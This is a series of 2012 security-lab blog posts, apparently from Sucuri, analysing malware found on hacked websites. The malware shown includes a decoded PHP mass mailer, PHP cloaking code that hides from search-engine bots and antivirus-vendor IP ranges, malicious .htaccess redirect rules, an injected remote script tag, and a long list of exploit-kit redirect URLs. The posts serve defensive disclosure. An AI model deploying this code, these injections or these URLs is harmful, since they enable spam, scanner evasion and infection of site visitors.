While looking at a compromised site, we found an interesting mass mailer in there. The contentwas encoded using eval/gzinflate and base64_decode:

<?php eval(gzinflate(base64_decode("1RprcxM58jtV/AehyyZ2rcdjOwkb7NjAhrBLFQGWhLvbAio1npFtLfNC.....</code></pre> <p>But when switching the "eval" for "print" we could see the mass mailer hidden and what it was doing:</p> <p><textarea cols=100 rows=20>$secure = "racrewmania@googlemail.com"; @$action=$_POST['action']; @$from=$_POST['from']; @$realname=$_POST['realname']; @$replyto=$_POST['replyto']; @$subject=$_POST['subject']; @$message=$_POST['message']; @$emaillist=$_POST['emaillist']; @$file_name=$_FILES['file']['name']; @$contenttype=$_POST['contenttype']; @$file=$_FILES['file']['tmp_name']; @$amount=$_POST['amount']; set_time_limit(intval($_POST['timelimit'])); ..<title>UnixStats Mass MaiLer</title>..for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending mail to $to......."; flush(); $header = "From: $realname <$from>rnReply-To: $replytorn"; $header .= "MIME-Version: 1.0rn"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uidrn"; If ($file_name) $header .= "--$uidrn"; $header .= "Content-Type: text/$contenttypern"; $header .= "Content-Transfer-Encoding: 8bitrnrn"; $header .= "$messagern"; If ($file_name) $header .= "--$uidrn"; If ($file_name) $header .= "Content-Type: $file_type; name="$file_name""rn""; If ($file_name) $header .= ""Content-Transfer-Encoding: base64rn""; If ($file_name) $header .= ""Content-Disposition: attachment; filename=""$file_name""rnrn""; If ($file_name) $header .= ""$contentrn""; If ($file_name) $header .= ""--$uid--""; mail($to</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 28, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1108 --> <article id="post-1109" class="post-1109 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/flagging-google-com-as-malware/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/flagging-google-com-as-malware/" rel="bookmark">Flagging google.com as malware</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Yesterday we listed <code>www.google.com</code> as being used for .htaccess conditional redirectionson hacked sites. Google does no evil, so what happened?</p> <p>We identified the source of the malware, which looks for certain user agents and IP addresses and redirects to <code>www.google.com</code> if it comes from them or to the real malware if not.</p> <p>This is the code:</p> <pre><code>$is_bot = FALSE ; $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#Safari#i', '#HTTrack#i', '#Chrome#i', '#Mac#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', .. '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#ngb#i' ) ; $stop_ips_masks = array( "66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255 "74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255 "65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255, "74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255 "67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255 "72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255 "38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255 "93\.172\.94\.227", // MacFinder "212\.100\.250\.218", // Wells Search II "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "193\.164\.202\.166", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "77\.193\.236\.225", "84\.155\.170\.196", "69\.174\.58\.36", "128\.103\.64\.[0-9]+", // StopBadWare "150\.70\.[0-9]+\.[0-9]+", // TrendMicro "216\.104\.[0-9]+\.[0-9]+", // TrendMicro "207\.46\.[0-9]+\.[0-9]+", // Microsoft "157\.55\.[0-9]+\.[0-9]+", // Microsoft "213\.180\.[0-9]+\.[0-9]+", // Yandex "217\.23\.[0-9]+\.[0-9]+", // Kaspersky "91\.103\.64\.[0-9]+", // Kaspersky "215\.5\.80\.[0-9]+", // Kaspersky "195\.168\.53\.[0-9]+", // NOD32 "117\.198\.48\.54", "110\.77\.248\.135", "87\.255\.51\.229", "206\.248\.243\.130", "124\.115\.6\.[0-9]+", "170\.252\.248\.[0-9]+", "217\.95\.225\.[0-9]+", "203\.17\.34\.[0-9]+", "220\.255\.1\.[0-9]+", // domain-tool.com "69\.28\.58\.[0-9]+", // Symantec "66\.231\.252\.[0-9]+", "126\.15\.99\.[0-9]+", "209\.128\.28\.[0-9]+", "91\.32\.55\.[0-9]+", "208\.72\.12\.[0-9]+", "84\.136\.88\.[0-9]+", "206\.80\.114\.[0-9]+", "24\.4\.75\.135", "66\.147\.244\.[0-9]+", // freepcsecurity.co.uk "128\.111\.48\.[0-9]+", // wepawet.cs.ucsb.edu "209\.9\.239\.[0-9]+", // jsunpack.jeek.org "62\.67\.194\.[0-9]+", // support.clean-mx.de "195\.214\.79\.[0-9]+", // support.clean-mx.de "97\.74\.141\.[0-9]+", // malwareurl.com "213\.171\.194\.[0-9]+", // spamhaus "139\.146\.167\.[0-9]+", // malwaredomains "88\.160\.229\.[0-9]+", // malwaredomains "69\.162\.79\.[0-9]+", // malwarebytes "66\.40\.145\.[0-9]+", // bitdefender "66\.223\.50\.[0-9]+", // bitdefender "204\.14\.90\.[0-9]+", // spywarewarrior.com "92\.123\.155\.[0-9]+", // Sophos "213\.31\.172\.[0-9]+", // Sophos "143\.215\.130\.[0-9]+", // Malwaredomainlist "150\.70\.172\.[0-9]+", // TrendNet "64\.88\.164\.[0-9]+", // AVG "102\.157\.192\.[0-9]+", // ZeusTracker "109\.65\.41\.[0-9]+", // ZeusTracker "110\.77\.248\.[0-9]+", // Virustotal "59\.6\.145\.[0-9]+", // Virustotal "67\.124\.37\.[0-9]+", // Virustotal "80\.190\.117\.[0-9]+", // Virustotal "202\.190\.74\.[0-9]+", // Virustotal "209\.160\.33\.[0-9]+", // Virustotal "91\.121\.139\.[0-9]+", // Virustotal "85\.87\.104\.[0-9]+", // Virustotal "96\.50\.0\.[0-9]+", // Virustotal "220\.225\.0\.52" ); foreach ( $stop_ips_masks as $k=>$v ) { if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) ) $is_bot = TRUE ; } if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ) { header("Location: http://www.google.com/"); die(); }</code></pre> <p>So, if you are not familiar with PHP, what this code is doing is checking for the user agent of some bots (Googlebot, MSN, Bing, etc) and for a few IP addresses for bots and anti virus companies (Trend, Bitdefender, etc). If the requests arecoming from them, they ignore the connection and redirect to <code>www.google.com</code>.</p> <p>That\'s why we were seeing <code>www.google.com</code> and listed it on our malware dump (already fixed).</p> <p>For all the other users (the victims), the malware was contacting <code>http://88.198.28.38/api.php?action=link</code> to get the URL to redirect (generally in the .tk domain). Any questions, let us know.</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 21, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1109 --> <article id="post-1110" class="post-1110 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/strange-htaccess-redirections-to-msn-com/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/strange-htaccess-redirections-to-msn-com/" rel="bookmark">Strange .htaccess redirections to msn.com</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>We are seeing something very strange on a few compromised sites lately. Instead ofdoing .htaccess redirections to malware sites, the attackers added the malware to redirect users to msn.com.</p> <p>This is what we are seeing on some hacked sites (.htaccess file):</p> <pre><code>RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://msn.com [R=301,L] .. lots of empty lines/ white spaces ... ErrorDocument 404 http://msn.com</code></pre> <p>If you are not familiar with the .htaccess syntax, it is basically redirecting any users coming from searchengines (Google, Bing, Yahoo and even Twitter/Facebook) to msn.com instead of going to the real site.</p> <p>Anyone have ideas? It seems like a bug in the attackers malware injection code, but we can\'t say for sure. And no, we do not think Microsoft is behind those (conspiracy theory). 🙂</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 18, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1110 --> <article id="post-1111" class="post-1111 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/malware-from-thesea-org-media-php/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/malware-from-thesea-org-media-php/" rel="bookmark">Malware from thesea.org/media.php</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>We are seeing many sites compromised with malware from thesea.org/media.php. All siteshad the following added to the .htaccess file:</p> <pre><code>RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://www.thesea.org/media.php [R=301,L]</code></pre> <p>So far we detected more than 500 sites with this type of <a href="https://labs.sucuri.net/?details=www.thesea.org">redirection</a> in the last few days.</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 11, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1111 --> <article id="post-1112" class="post-1112 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/malware-from-paysafecard-name/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/malware-from-paysafecard-name/" rel="bookmark">Malware from paysafecard.name</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Seeing many sites compromised with malware from paysafecard.name/analitics.js. This is the js inserted on the hacked pages:</p> <pre><code><! --pizda-- ><script type=text/javascript  src= http://paysafecard.name/analitics.js?ftpid=19741></script><!--/pizda--></code></pre> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 7, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1112 --> <article id="post-1113" class="post-1113 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/malicious-redirections-to-exploit-kits/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/malicious-redirections-to-exploit-kits/" rel="bookmark">Malicious redirections to exploit kits</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>We talk a lot about sites that get hacked to redirect their users to malicious exploit kits (<a href="/https://labs.sucuri.net/?note=2012/06/04">blackhole</a>, etc). Very often we see encoded javascript and our users ask what they do...Those are some of the URLs we saw just this last week being used by the attackers. </p> <pre><code>aaasssasssssssasa.myfw.us/?go=2 abcplyjxj.ibiz.cc/?go=2 abdrfdvfgdrvser.lowestprices.at/?go=2 aeryaay2nyusmui7.lowestprices.at/?go=2 afrgbajp.ibiz.cc/d/404.php?go=1 akyjdcfovc.ibiz.cc/d/404.php?go=1 alph3464.no-ip.org/?go=2 amhdhsnjmx.usa.cc/d/404.php?go=1 amsmkxh.ibiz.cc/d/404.php?go=1 aoytzrk.igg.biz/d/404.php?go=1 apdqbnl.igg.biz/d/404.php?go=1 apkdng.xxxy.info/d/404.php?go=1 apmhyocvl.igg.biz/d/404.php?go=1 aprcredits.kwik.to/d/404.php?go=1 areabreytnt.lowestprices.at/?go=2 areahedun.findhere.org/?go=2 arhecug.tld.cc/d/404.php?go=1 arna5237.hopto.org/?go=2 artva3hsyjtis8ss.lowestprices.at/?go=2 aucvpqnebv.tld.cc/d/404.php?go=1 aukqjxs.usa.cc/d/404.php?go=1 avrrrqvrtyunbtgjtrty.lowestprices.at/?go=2 ayuqymox.ibiz.cc/d/404.php?go=1 badfgrcaxww.rr.nu/?go=2 baryaccvbrtvnj.byinter.net/?go=2 bastryavervct.byinter.net/?go=2 bety6uye4v5r6y.lowestprices.at/?go=2 bfbgfdfdfffghgvvbjj.rr.nu/?go=2 bfguzmf.ibiz.cc/d/404.php?go=1 bftvdcrdfgdrvfvcd.kwik.to/?go=2 bgkdgdkww.1dumb.com/d/404.php?go=1 bgqbioyqky.igg.biz/d/404.php?go=1 biseiuhfggf.rr.nu/?go=2 bkzkeypfxy.changeip.name/?go=1 bmfxsfgpbj.ddns.info/?go=2 bnugujngjuhgygjgh.kwik.to/?go=2 brtftghynuiuynbrtvrvfdgg.rr.nu/?go=2 bssjxted.usa.cc/d/404.php?go=1 btrvecydcvb.byinter.net/?go=2 btyinonds.rr.nu/?go=2 buihbqidt.ibiz.cc/d/404.php?go=1 bwtrvwtrvsrvdfb.byinter.net/?go=2 bxwtlawdpz.proxydns.com/d/404.php?go=1 bxwvnyofk.usa.cc/d/404.php?go=1 byeytnsbvhrtbt.byinter.net/?go=2 bytvedcffn.byinter.net/?go=2 bzmechl.igg.biz/?go=2 cdsrcvvy.myredirect.us/?go=2 cdxvuoyo.igg.biz/d/404.php?go=1 cgmzhjthg.igg.biz/d/404.php?go=1 cgyucykhuil.myfw.us/?go=2 chfkidjtybs.findhere.org/?go=2 ckdgmmeo.igg.biz/?go=2 cmlvugtb.ibiz.cc/d/404.php?go=1 cmrumpglb.myfw.us/?go=2 cngyyyucdmtynrt7t.rr.nu/?go=2 cntwshy.bigmoney.biz/?go=2 cpngdayqt.igg.biz/d/404.php?go=1 ctculsq.ibiz.cc/d/404.php?go=1 ctjcykgmmy.byinter.net/?go=2 ctrcvtfgdfc.rr.nu/?go=2 cuybcxizxdied.myredirect.us/?go=2 cxxxcvxccxvcxcxvxcc.findhere.org/?go=2 dddssddddsdsddddd.myfw.us/?go=2 dfgitffjr.igg.biz/?go=2 dfhgodjfg.rr.nu/?go=2 dfmnbvuieiorf.rr.nu/?go=2 dfnmmcvguierfd.rr.nu/?go=2 dgdbqpdvh.igg.biz/d/404.php?go=1 dghmkufdnr.findhere.org/?go=2 dmujkkz.igg.biz/d/404.php?go=1 dnbtvra56byyunyn7.lowestprices.at/?go=2 dpiwixdu.igg.biz/d/404.php?go=1 drihifpug.ibiz.cc/d/404.php?go=1 drjdrdjgyiuu.myfw.us/?go=2 dsyoylhbg.usa.cc/d/404.php?go=1 dtyisysrsrst.lookin.at/?go=2 dtynuyiuoiuyrewq3crth.lowestprices.at/?go=2 dvafaiw.igg.biz/?go=2 dwewphuamf.igg.biz/?go=2 dwpgdtk.igg.biz/d/404.php?go=1 dwrmdybckw.lookin.at/?go=2 ebbye5nez3z2zn5.findhere.org/?go=2 edknvzrqb.ibiz.cc/d/404.php?go=1 eeqmhjjhs.igg.biz/d/404.php?go=1 efehxuwclcj.rr.nu/?go=2 efylnux.usa.cc/?go=2 eksamekxo.myfw.us/?go=2 emjqjkxdur.ddns.ms/d/404.php?go=1 enrymrynzrbytr.myfw.us/?go=2 erateraervacer.myredirect.us/?go=2 erbzydbftfnt.lowestprices.at/?go=2 ertguinodkf.rr.nu/?go=2 eurbynydtybtvy.myfw.us/?go=2 euwqhtspec.dns1.us/d/404.php?go=1 evrtnnruxrnrt.myfw.us/?go=2 ewcjvkiufgv.lowestprices.at/?go=2 eweweeeeweweee.myfw.us/?go=2 eyglwirdba.mynetav.org/d/404.php?go=1 eyksvvuez.ibiz.cc/d/404.php?go=1 f%67j.U%67ly%41s.c%6Fm/b.js?google=4x243 faydplspl.findhere.org/?go=2 fbybldtb.igg.biz/d/404.php?go=1 fdesjhkjjl.lowestprices.at/?go=2 fdgffjhg.myfw.us/?go=2 fdgfjhgyyt.myfw.us/?go=2 fdghdjnbvcr.byinter.net/?go=2 fdgzdfghbs.findhere.org/?go=2 fdsdcjytygui.myfw.us/?go=2 ffymxtbfrb.byinter.net/?go=2 fghmxmzbsxtr.findhere.org/?go=2 fgj.UglyAs.com/b.js?google=4x243 fgxbyninbyacw5v9bg.lowestprices.at/?go=2 fiudertjkfjgf.rr.nu/?go=2 fjljzl.xxuz.com/d/404.php?go=1 fmhjxgxn.ibiz.cc/d/404.php?go=1 fmhotwneiv.ibiz.cc/d/404.php?go=1 fncnkvqiuo.ikwb.com/d/404.php?go=1 fnwcmrnh.usa.cc/?go=2 fqmhypjfv.ibiz.cc/?go=2 fsbbihiwm.igg.biz/?go=2 ftbhstrrrrrrvtjyun4kk.lowestprices.at/?go=2 ftyktrtukghui.myfw.us/?go=2 fugqhewma.igg.biz/d/404.php?go=1 fxqkcicgp.kwik.to/?go=2 fyuidnysutms.kwik.to/?go=2 fyvmnfvb.ibiz.cc/?go=2 fzdzyrhysr.byinter.net/?go=2 gcyyaniw.tld.cc/d/404.php?go=1 gfdjhljkjb.myfw.us/?go=2 gfdxtcfvb.myredirect.us/?go=2 gfhmgvjhb.myfw.us/?go=2 ghceswze.dns05.com/d/404.php?go=1 ghdmghjdnx.findhere.org/?go=2 gjboeqpgly.usa.cc/d/404.php?go=1 gjxmrxfm.ibiz.cc/d/404.php?go=1 gnxnyubrzytuy.lowestprices.at/?go=2 grcdyctkfb.myfw.us/?go=2 grcvjuykini.byinter.net/?go=2 grllqdvv.igg.biz/d/404.php?go=1 gwvrteyrvf.byinter.net/?go=2 gxdtrdcv.myfw.us/?go=2 gxsiwmxki.usa.cc/d/404.php?go=1 gxswmxew.ibiz.cc/d/404.php?go=1 gyxrbktsj.igg.biz/d/404.php?go=1 hbdfvtfhhgjwrrtvytsw.kwik.to/?go=2 hemfnlqvit.igg.biz/d/404.php?go=1 hfcuytfkuby.myfw.us/?go=2 hfgcfweryer.findhere.org/?go=2 hgcnhfghj.lowestprices.at/?go=2 hgfdxhfcf.myredirect.us/?go=2 hhcenlq.igg.biz/d/404.php?go=1 higmkxgail.myfw.us/?go=2 hiolafr.usa.cc/d/404.php?go=1 hjgjxgfkjl.myfw.us/?go=2 hjkllllhhggggfffvvbbbn.findhere.org/?go=2 hqwkmqcw.igg.biz/d/404.php?go=1 hsbfvtrcdf.byinter.net/?go=2 hsdiljzff.igg.biz/?go=2 htdxtsth.myfw.us/?go=2 htrxcytvfmhg.lowestprices.at/?go=2 htupjnh.usa.cc/d/404.php?go=1 hvajsve.usa.cc/d/404.php?go=1 hxzwrfupqejv.ontheweb.nu/?go=2 hygviybg.myredirect.us/?go=2 ibeshqlc.usa.cc/d/404.php?go=1 ifagxfzl.ibiz.cc/?go=2 ifpbvcjfg.toythieves.com/d/404.php?go=1 igyryiplgve.findhere.org/?go=2 ihhqeabdsp.igg.biz/d/404.php?go=1 ijbctmcec.tld.cc/d/404.php?go=1 ilnliuikouiknjihk.kwik.to/?go=2 impiofkl.usa.cc/d/404.php?go=1 inthlbkehg.tld.cc/d/404.php?go=1 ionswxedsw.igg.biz/d/404.php?go=1 ipdgzjho.igg.biz/d/404.php?go=1 isphrnj.ibiz.cc/?go=2 isytayms.dyndnst.info/?go=2 itimihqrqa.ns01.biz/d/404.php?go=1 itunesg.ibiz.cc/?go=2 iweayvuav.igg.biz/?go=2 ixfnzhz.tld.cc/d/404.php?go=1 izcqqhfrgu.tld.cc/d/404.php?go=1 jcyatwzs.igg.biz/d/404.php?go=1 jdeqeyay.igg.biz/d/404.php?go=1 jent2207.myvnc.com/?go=2 jfgwryykjgf.findhere.org/?go=2 jfhtsfvvfghr.findhere.org/?go=2 jjjllaf.igg.biz/?go=2 jkhgcxdjl.myfw.us/?go=2 jmcbhjuv.usa.cc/d/404.php?go=1 jocxqfdgl.moneyhome.biz/d/404.php?go=1 jqtgdbdd.igg.biz/d/404.php?go=1 jrqnlzqy.usa.cc/?go=2 jsulftmiuw.igg.biz/d/404.php?go=1 jurtdfghtew.findhere.org/?go=2 jvqoovjxxq.igg.biz/d/404.php?go=1 jwtaqhw.ibiz.cc/d/404.php?go=1 jxdfggbfrhf.findhere.org/?go=2 jxsgnvxfg.findhere.org/?go=2 jygvfjhgjhjk.byinter.net/?go=2 jyhtgxycg.myfw.us/?go=2 jysresgfcb.byinter.net/?go=2 kchojcd.ibiz.cc/d/404.php?go=1 kgpoqamori.igg.biz/d/404.php?go=1 kgscnhzeb.igg.biz/d/404.php?go=1 khapgtil.ibiz.cc/d/404.php?go=1 kksnisqtj.tld.cc/d/404.php?go=1 klvrxsys.1dumb.com/d/404.php?go=1 kmurquryp.igg.biz/?go=2 knvflrl.ibiz.cc/?go=2 kpkdkuhrvd.usa.cc/d/404.php?go=1 ksfiolq.ibiz.cc/?go=2 ktntwxcy.usa.cc/?go=2 kubgfghzy.igg.biz/?go=2 kukchvgjh.myfw.us/?go=2 kuyicutdtvrfh.byinter.net/?go=2 kuyyctrdtfybgh.myfw.us/?go=2 kyubdyyyb.lookin.at/?go=2 kznfykfj.1dumb.com/d/404.php?go=1 lahkfbswvx.igg.biz/d/404.php?go=1 lbxdmes.usa.cc/?go=2 lczkbeujxf.kwik.to/?go=2 ldsysgcaix.igg.biz/d/404.php?go=1 ldwosuep.ibiz.cc/d/404.php?go=1 lioerpcbi.myfw.us/?go=2 lnfkwqcdj.findhere.org/?go=2 lnnpcsttih.findhere.org/?go=2 lnxnib.zyns.com/?go=2 lturvqaq.ibiz.cc/d/404.php?go=1 managemented123.usa.cc/d/404.php?go=1 maxqvjifc.usa.cc/d/404.php?go=1 mcpivmu.igg.biz/d/404.php?go=1 mcrbhdlfwb.usa.cc/d/404.php?go=1 mcxfvqntr.igg.biz/d/404.php?go=1 mdin7tuity.kwik.to/?go=2 meyevbbsa.usa.cc/d/404.php?go=1 mfundghbhhxfbty3nxd.rr.nu/?go=2 mhoqccnlag.ibiz.cc/?go=2 mjqrpybpkn.ontheweb.nu/?go=2 mkulorefj.igg.biz/d/404.php?go=1 mmnvvipxm.igg.biz/d/404.php?go=1 mnhgfcyvtvb.myredirect.us/?go=2 molycribf.usa.cc/d/404.php?go=1 mouzyyza.myftp.name/d/404.php?go=1 movnxnwh.igg.biz/d/404.php?go=1 mpnnythpdxt.kwik.to/?go=2 mqvtrt.got-game.org/?go=2 mqyenu.dns05.com/d/404.php?go=1 mr8o067nrtrvr.myfw.us/?go=2 mremfzlt.igg.biz/d/404.php?go=1 msr5bumdtbcg5nebr.findhere.org/?go=2 mtyndtyudnzst6ymu87u.rr.nu/?go=2 mxngnfbfgg.kwik.to/?go=2 mxnjnwvbad.lookin.at/?go=2 mytindbfxxt.lowestprices.at/?go=2 nbnvnvvbvbvvvbnvvbnvnb.findhere.org/?go=2 nbtdyurnbtdy.lowestprices.at/?go=2 ndbussg.rr.nu/?go=2 ndqrpmr.igg.biz/?go=2 ndrttev4btrytn.ontheweb.nu/?go=2 ndttbyy5ntyn87n.lowestprices.at/?go=2 ndtwr567nkyur7y.lowestprices.at/?go=2 ndytnibterbtyqvj654.lowestprices.at/?go=2 ne56b7n8nuybytb.lowestprices.at/?go=2 nelzhbv.qhigh.com/d/404.php?go=1 netyjw55q6u.myfw.us/?go=2 nfeqrhe.usa.cc/?go=2 ngbfbgnbjkcjhnbty5.rr.nu/?go=2 ngfytrtu.myfw.us/?go=2 nhthzkwhu.ibiz.cc/?go=2 nird56tybun.lowestprices.at/?go=2 niyaimuns.igg.biz/d/404.php?go=1 niyqbxwenz.ibiz.cc/d/404.php?go=1 njphwkb.ibiz.cc/d/404.php?go=1 njuyiulbtobt.rr.nu/?go=2 nklxaeum.usa.cc/?go=2 nmmnvqtyp.ibiz.cc/d/404.php?go=1 nmwakcu.itsaol.com/d/404.php?go=1 nmxbrjst.freetcp.com/d/404.php?go=1 nnpfucpvtf.tld.cc/d/404.php?go=1 nstrbusrvae.lookin.at/?go=2 ntdyubxrtuutt.myfw.us/?go=2 ntdyuemn565ntyne.lowestprices.at/?go=2 ntgdtwpq.ns1.name/d/404.php?go=1 ntxtnrnnnntbevdr5y.findhere.org/?go=2 ntydstrnbstbbr.lookin.at/?go=2 nuprhvper.tld.cc/d/404.php?go=1 nvxcvjwzk.ibiz.cc/d/404.php?go=1 nwfufzawwsn.findhere.org/?go=2 nxfbfxgyxjnft.byinter.net/?go=2 nymfiultrnb65ert.lowestprices.at/?go=2 nysbrtyjdjntytdrj7yn.rr.nu/?go=2 nytndbssyrtkjuykiryu7.rr.nu/?go=2 nytubdtynsb.lookin.at/?go=2 nzerynzbrnnt666.myfw.us/?go=2 nzvnrovc.igg.biz/d/404.php?go=1 oaijvhw.igg.biz/?go=2 ocafqqsgcz.usa.cc/d/404.php?go=1 ocapyaj.ibiz.cc/?go=2 odzyzjyyi.rr.nu/?go=2 oemiflwymu.igg.biz/d/404.php?go=1 ofhnhiunuby.findhere.org/?go=2 ofjqucwku.ibiz.cc/d/404.php?go=1 ogfazhv.2waky.com/d/404.php?go=1 oibmugez.igg.biz/d/404.php?go=1 ok56gpnu99o.ce.ms/i.php?go=1 olnlueg.igg.biz/d/404.php?go=1 